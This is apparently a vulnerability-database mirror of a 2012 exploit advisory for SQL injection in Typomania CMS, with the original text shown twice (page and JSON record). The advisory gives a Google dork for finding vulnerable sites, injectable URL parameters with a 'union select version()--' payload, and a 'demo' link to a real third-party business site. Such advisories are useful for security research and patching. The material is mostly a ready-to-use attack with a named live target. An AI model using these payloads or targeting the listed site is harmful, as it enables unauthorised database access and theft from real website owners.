Search...

Typomania CMS SQL Injection

2012-08-25T00:00:00

ID PACKETSTORM:115899
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: Typomania CMS cms Sql Injection Vulnerability  
#  
# Google Dork:intext:"powered by Typomania CMS"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home :   
http://www.typomania.co.uk/typomania/products/typomania-service-plans/  
#  
# Tested on: all  
#  
###################################################################################  
  
$  
$ ----Author will be not responsible for any damage----  
$  
###################################################################################  
  
  
========================================  
http://www.target.com/gallery.php?id=[id]'  
http://www.target.com/news.php?item_id=[id]'  
+union+select+version()--  
D3M0 :   
http://www.wildarttaxidermy.co.uk/news.php?item_id=27  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir  
`

JSON Vulners Source

Initial Source

{"hash": "361bd9cae7034e8e825b0e840d244f784224c66d7e4f79d4bdb7db84e825314b", "sourceHref": "https://packetstormsecurity.com/files/download/115899/typomania-sql.txt", "title": "Typomania CMS SQL Injection", "id": "PACKETSTORM:115899", "published": "2012-08-25T00:00:00", "description": "", "modified": "2012-08-25T00:00:00", "sourceData": "`################################################################################### \n \n# Exploit Title: Typomania CMS cms Sql Injection Vulnerability \n# \n# Google Dork:intext:\"powered by Typomania CMS\" \n# \n# Date: 08/24/2012 \n# \n# Author: Crim3R \n# \n# Vendor Home : \nhttp://www.typomania.co.uk/typomania/products/typomania-service-plans/ \n# \n# Tested on: all \n# \n################################################################################### \n \n$ \n$ ----Author will be not responsible for any damage---- \n$ \n################################################################################### \n \n \n======================================== \nhttp://www.target.com/gallery.php?id=[id]' \nhttp://www.target.com/news.php?item_id=[id]' \n+union+select+version()-- \nD3M0 : \nhttp://www.wildarttaxidermy.co.uk/news.php?item_id=27 \n \n===============Crim3R@Att.Net=========== \n \n$home = %00 \nthanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir \n`\n", "reporter": "Crim3R", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9fcd885fbcda4883533f2720aff55e3f"}, {"key": "modified", "hash": "bc339c7b69513906085fb3a50edba3e0"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "bc339c7b69513906085fb3a50edba3e0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "70db969f88a9b0ac497fcb59806c0942"}, {"key": "sourceData", "hash": "7ff8baebba45319d8007f650dea7dcea"}, {"key": "sourceHref", "hash": "3801d0cf287a4a9556d443304d7732e3"}, {"key": "title", "hash": "d3c5652240e21bf10134b8c9980acdc7"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/115899/Typomania-CMS-SQL-Injection.html", "lastseen": "2016-11-03T10:28:25", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}